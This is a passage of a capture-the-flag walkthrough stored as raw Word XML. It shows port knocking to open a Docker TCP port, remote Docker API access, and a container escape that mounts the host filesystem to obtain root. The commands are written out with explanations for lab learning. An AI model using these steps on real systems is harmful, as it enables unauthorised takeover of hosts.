          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E9771A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="001949D1" w:rsidRPr="00E9771A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>d /root; git checkout &lt;commit number &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BADDC69" w14:textId="37ED8535" w:rsidR="00943DBA" w:rsidRDefault="00943DBA" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E1C0CA9" w14:textId="70712A71" w:rsidR="00943DBA" w:rsidRDefault="001F68DC" w:rsidP="00352F45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B01DB55" wp14:editId="3CF44586">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>297180</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>457835</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5562600" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="19050" b="2032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9CE2D2" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                                <w:i/>
                                <w:iCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00616858">
                              <w:rPr>
                                <w:rFonts w:ascii="Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                                <w:i/>
                                <w:iCs/>
                              </w:rPr>
                              <w:t>Hey guys,</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3EB6441E" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                                <w:i/>
                                <w:iCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="716004B8" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                                <w:i/>
                                <w:iCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00616858">
                              <w:rPr>
                                <w:rFonts w:ascii="Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                                <w:i/>
                                <w:iCs/>
                              </w:rPr>
                              <w:t>I got tired of losing the ssh key all the time so I setup a way to open up the docker for remote admin.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0BA1EE2C" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                                <w:i/>
                                <w:iCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="5E3AD40A" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                                <w:i/>
                                <w:iCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00616858">
                              <w:rPr>
                                <w:rFonts w:ascii="Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                                <w:i/>
                                <w:iCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">Just </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="00616858">
                              <w:rPr>
                                <w:rFonts w:ascii="Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                                <w:i/>
                                <w:iCs/>
                              </w:rPr>
                              <w:t>knock on</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00616858">
                              <w:rPr>
                                <w:rFonts w:ascii="Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                                <w:i/>
                                <w:iCs/>
                              </w:rPr>
                              <w:t xml:space="preserve"> ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="11E57D78" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                                <w:i/>
                                <w:iCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="2C0B2569" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                                <w:i/>
                                <w:iCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00616858">
                              <w:rPr>
                                <w:rFonts w:ascii="Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                                <w:i/>
                                <w:iCs/>
                              </w:rPr>
                              <w:t>Cheers,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01DB55" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:23.4pt;margin-top:36.05pt;width:438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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="159CE2D2" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                          <w:i/>
                          <w:iCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00616858">
                        <w:rPr>
                          <w:rFonts w:ascii="Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                          <w:i/>
                          <w:iCs/>
                        </w:rPr>
                        <w:t>Hey guys,</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3EB6441E" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                          <w:i/>
                          <w:iCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="716004B8" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                          <w:i/>
                          <w:iCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00616858">
                        <w:rPr>
                          <w:rFonts w:ascii="Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                          <w:i/>
                          <w:iCs/>
                        </w:rPr>
                        <w:t>I got tired of losing the ssh key all the time so I setup a way to open up the docker for remote admin.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0BA1EE2C" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                          <w:i/>
                          <w:iCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="5E3AD40A" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                          <w:i/>
                          <w:iCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00616858">
                        <w:rPr>
                          <w:rFonts w:ascii="Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                          <w:i/>
                          <w:iCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">Just </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00616858">
                        <w:rPr>
                          <w:rFonts w:ascii="Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                          <w:i/>
                          <w:iCs/>
                        </w:rPr>
                        <w:t>knock on</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00616858">
                        <w:rPr>
                          <w:rFonts w:ascii="Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                          <w:i/>
                          <w:iCs/>
                        </w:rPr>
                        <w:t xml:space="preserve"> ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="11E57D78" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                          <w:i/>
                          <w:iCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="2C0B2569" w14:textId="77777777" w:rsidR="00616858" w:rsidRPr="00616858" w:rsidRDefault="00616858" w:rsidP="001F68D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Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                          <w:i/>
                          <w:iCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00616858">
                        <w:rPr>
                          <w:rFonts w:ascii="Baskerville Old Face" w:eastAsia="Times New Roman" w:hAnsi="Baskerville Old Face" w:cs="Courier New"/>
                          <w:i/>
                          <w:iCs/>
                        </w:rPr>
                        <w:t>Cheers,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3DBA">
        <w:t xml:space="preserve">We find a changed note and the docker containers root flag. </w:t>
      </w:r>
      <w:r w:rsidR="00616858">
        <w:t xml:space="preserve">We get introduced to the concept of port knocking. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3063D570" w14:textId="64DC3F31" w:rsidR="00616858" w:rsidRDefault="00616858" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75ABA535" w14:textId="15F56FEE" w:rsidR="00616858" w:rsidRDefault="00CC4447" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Port Knocking is a security measure that is used to secure a server. Sometimes it is used with a firewall. It is a way to identify users and make sure that they are legitimate. Ports are closed on a firewall by default. A pre-defined sequence is </w:t>
      </w:r>
      <w:r w:rsidR="004F40BF">
        <w:t xml:space="preserve">set and if a user attempts to connect using this </w:t>
      </w:r>
      <w:r w:rsidR="00911E39">
        <w:t>sequence,</w:t>
      </w:r>
      <w:r w:rsidR="004F40BF">
        <w:t xml:space="preserve"> the port that is supposed to be closed becomes open, so in order to open the docker port we need to knock. (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004F40BF">
        <w:t>can</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004F40BF">
        <w:t xml:space="preserve"> be installed by apt install knockd) for Parrot. </w:t>
      </w:r>
      <w:r w:rsidR="003432F3">
        <w:t>You can fin</w:t>
      </w:r>
      <w:r w:rsidR="00D86B32">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="003432F3">
        <w:t xml:space="preserve"> out more </w:t>
      </w:r>
      <w:r w:rsidR="00D86B32">
        <w:t xml:space="preserve">concerning port knocking here </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00D86B32" w:rsidRPr="00744A47">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.interserver.net/tips/kb/what-is-port-knocking/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003432F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B12C4E" w14:textId="3EFD6488" w:rsidR="004F40BF" w:rsidRDefault="004F40BF" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A069817" w14:textId="1B1FAEA1" w:rsidR="004F40BF" w:rsidRPr="00E9771A" w:rsidRDefault="004F40BF" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9771A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Knock -v $ip_address 42 1337 10420 6969 63000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297B23D1" w14:textId="0C87A9D5" w:rsidR="00336F22" w:rsidRPr="00336F22" w:rsidRDefault="00336F22" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>|__ will port knock with the above sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2E5A94" w14:textId="7955BE9F" w:rsidR="004F40BF" w:rsidRDefault="004F40BF" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1826B516" w14:textId="6AE42DDD" w:rsidR="00336F22" w:rsidRDefault="004F40BF" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The Docker port should be open, by default on port 2375. We can do a nmap scan soley on that port or we can</w:t>
      </w:r>
      <w:r w:rsidR="00336F22">
        <w:t xml:space="preserve"> proceed with attempting to connect to it remotely using docker. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC058EB" w14:textId="441FFCEC" w:rsidR="00336F22" w:rsidRDefault="00336F22" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A36C380" w14:textId="5CAACB58" w:rsidR="00336F22" w:rsidRPr="00E9771A" w:rsidRDefault="00336F22" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9771A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E9771A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Docker -H tcp://$ip_address:2375 image ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C9ABF3" w14:textId="77777777" w:rsidR="008E13C1" w:rsidRDefault="00336F22" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6780E6" w14:textId="08A72A48" w:rsidR="008E13C1" w:rsidRDefault="008E13C1" w:rsidP="008E13C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>H :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> specifies the</w:t>
      </w:r>
      <w:r w:rsidR="002D3A59">
        <w:t xml:space="preserve"> remote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690770D3" w14:textId="77777777" w:rsidR="0066033E" w:rsidRDefault="008E13C1" w:rsidP="008E13C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tcp:// </w:t>
      </w:r>
      <w:r w:rsidR="0066033E">
        <w:t>will connect to the remote target using the TCP socker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F47D10D" w14:textId="586AEF81" w:rsidR="00336F22" w:rsidRDefault="0066033E" w:rsidP="008E13C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">image </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ls :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E13C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00336F22">
        <w:t xml:space="preserve">will list the images on the container. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC21742" w14:textId="7A0328D9" w:rsidR="00336F22" w:rsidRDefault="00336F22" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6642FFEB" w14:textId="483B2C24" w:rsidR="00336F22" w:rsidRDefault="00336F22" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>We see that the alpine image is available amongst others.</w:t>
      </w:r>
      <w:r w:rsidR="008E13C1">
        <w:t xml:space="preserve"> I have test this with alpine:3.9, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008E13C1">
        <w:t>nginx:latest</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008E13C1">
        <w:t xml:space="preserve">, Debian:10-slim and this technique works. Feel free to attempt </w:t>
      </w:r>
      <w:r w:rsidR="0066033E">
        <w:t xml:space="preserve">with any others. This technique involves mounting the host OS into the docker container and then logging in. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21193E5E" w14:textId="607A5518" w:rsidR="0066033E" w:rsidRDefault="0066033E" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69348367" w14:textId="77777777" w:rsidR="00CF6DF0" w:rsidRPr="00E9771A" w:rsidRDefault="0066033E" w:rsidP="0066033E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9771A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Docker -H tcp://$ip_address:2375 run</w:t>
      </w:r>
      <w:r w:rsidR="00CF6DF0" w:rsidRPr="00E9771A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> –it -v –rm /:/mnt/host alpine:3.9 /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4718E820" w14:textId="75B76824" w:rsidR="00CF6DF0" w:rsidRDefault="00CF6DF0" w:rsidP="0066033E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">|__ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>run :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> execute the following commands on the OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CC9AF0" w14:textId="77777777" w:rsidR="00CF6DF0" w:rsidRDefault="00CF6DF0" w:rsidP="0066033E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>|__ --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> make an interactive shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36483B41" w14:textId="0C96FAA8" w:rsidR="00CF6DF0" w:rsidRDefault="00CF6DF0" w:rsidP="0066033E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>|__ -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">v </w:t>
      </w:r>
      <w:r w:rsidR="002D3A59">
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002D3A59">
        <w:t xml:space="preserve"> mouting volume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182317DB" w14:textId="6FF4CC14" w:rsidR="00CF6DF0" w:rsidRDefault="002D3A59" w:rsidP="0066033E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>|__ --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rm :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> remove the container after the user exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350ACF32" w14:textId="0A40D1F5" w:rsidR="002D3A59" w:rsidRDefault="002D3A59" w:rsidP="0066033E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>|__ /bin/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sh :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open a shell after execution of commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4F533E" w14:textId="40393675" w:rsidR="002D3A59" w:rsidRDefault="002D3A59" w:rsidP="0066033E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DEB0489" w14:textId="07500091" w:rsidR="002D3A59" w:rsidRDefault="002D3A59" w:rsidP="0066033E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We get a shell and if we change directory into /mnt/host we have the entire host OS mounted. We can go into the /root flag and get the actual root flag. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23326B28" w14:textId="6045A503" w:rsidR="002D3A59" w:rsidRDefault="002D3A59" w:rsidP="0066033E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD848DE" w14:textId="1EF67905" w:rsidR="002D3A59" w:rsidRDefault="002D3A59" w:rsidP="0066033E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phew! This was definitely an interesting room. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ABC6C3" w14:textId="77777777" w:rsidR="002D3A59" w:rsidRPr="00CF6DF0" w:rsidRDefault="002D3A59" w:rsidP="0066033E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456F6140" w14:textId="5DDE7443" w:rsidR="00CF6DF0" w:rsidRDefault="0066033E" w:rsidP="0066033E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F555B" w14:textId="537187B1" w:rsidR="0066033E" w:rsidRPr="0066033E" w:rsidRDefault="0066033E" w:rsidP="0066033E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0066033E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0D308B" w14:textId="3E0C1139" w:rsidR="0066033E" w:rsidRDefault="0066033E" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFD918B" w14:textId="77777777" w:rsidR="0066033E" w:rsidRPr="00746F7B" w:rsidRDefault="0066033E" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0066033E" w:rsidRPr="00746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45B"/>
    <w:rsid w:val="000538CD"/>
    <w:rsid w:val="000B3846"/>
    <w:rsid w:val="0013115D"/>
    <w:rsid w:val="001949D1"/>
    <w:rsid w:val="001F68DC"/>
    <w:rsid w:val="00201F73"/>
    <w:rsid w:val="0022145F"/>
    <w:rsid w:val="002D3A59"/>
    <w:rsid w:val="002E44D1"/>
    <w:rsid w:val="00336F22"/>
    <w:rsid w:val="003432F3"/>
    <w:rsid w:val="00352F45"/>
    <w:rsid w:val="003C1E85"/>
    <w:rsid w:val="0041638E"/>
    <w:rsid w:val="004D675C"/>
    <w:rsid w:val="004F40BF"/>
    <w:rsid w:val="00616858"/>
    <w:rsid w:val="006517C3"/>
    <w:rsid w:val="0066033E"/>
    <w:rsid w:val="0067745B"/>
    <w:rsid w:val="007101C0"/>
    <w:rsid w:val="00746F7B"/>
    <w:rsid w:val="00805C2A"/>
    <w:rsid w:val="008353D4"/>
    <w:rsid w:val="008A1424"/>
    <w:rsid w:val="008E13C1"/>
    <w:rsid w:val="00911E39"/>
    <w:rsid w:val="00943DBA"/>
    <w:rsid w:val="00952D19"/>
    <w:rsid w:val="00A4757E"/>
    <w:rsid w:val="00B111AC"/>
    <w:rsid w:val="00B33EDA"/>
    <w:rsid w:val="00BB2F87"/>
    <w:rsid w:val="00CC4447"/>
    <w:rsid w:val="00CF6DF0"/>
    <w:rsid w:val="00D86B32"/>
    <w:rsid w:val="00E7469D"/>
    <w:rsid w:val="00E9771A"/>
    <w:rsid w:val="00EA2B46"/>
    <w:rsid w:val="00F105FC"/>
    <w:rsid w:val="00F3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EC391"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{56BB47D1-94E4-4AFC-A3A7-F95D99A63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11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115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68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685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168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95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terserver.net/tips/kb/what-is-port-knockin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nullprogram.com/blog/2019/03/22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$ip_address_docker/api/exif?url=" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://$attacking_ip:8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docker-escape.thm/FUZZ%20-w%20directory-medium-list-2.3.tx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1357</Words>
  <Characters>7740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2022-05-22T17:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-24T12:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>